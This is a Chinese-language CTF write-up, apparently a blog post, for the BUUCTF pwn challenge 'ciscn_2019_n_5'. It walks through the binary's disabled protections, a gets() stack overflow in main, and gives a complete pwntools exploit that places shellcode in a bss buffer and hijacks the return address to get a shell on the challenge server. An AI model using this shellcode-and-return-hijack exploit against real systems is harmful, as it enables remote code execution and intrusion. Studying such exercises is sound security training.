2023-11-15 20:25

|

646

|

0

140 字

|

3 分钟

ciscn 2019 n 5

前提

查看文件保护

[*] '/root/pwn/buuctf/ciscn_2019_n_5/ciscn_2019_n_5'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

静态分析

主函数如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char text[30]; // [rsp+0h] [rbp-20h] BYREF

  setvbuf(stdout, 0LL, 2, 0LL);
  puts("tell me your name");
  read(0, name, 0x64uLL);
  puts("wow~ nice name!");
  puts("What do you want to say to me?");
  gets(text);
  return 0;
}

思路分析

目前信息：
- main函数内明显的栈溢出漏洞
- No PIE
- 有RWX权限
补充：
- name变量在bss段长度为0x64字节
思路：
- 可栈溢出，有RWX权限，考虑在name变量处写入shellcode，返回溢出劫持返回地址到该处以获得shell

exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/ciscn_2019_n_5/ciscn_2019_n_5'
io = remote('node4.buuoj.cn', 28134)
# io = process(pwnfile)
elf = ELF(pwnfile)
padding = 0x20+8
bss_name = 0x601080
shellcode = asm(shellcraft.sh())
payload = flat([shellcode])
io.sendlineafter(' name\n', payload)
payload = flat(['a'*padding, bss_name])
io.sendlineafter(' to me?\n', payload)
io.interactive()

Buuctf Pwn StackOverflow

暂无评论

发送评论编辑评论

悄悄话

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!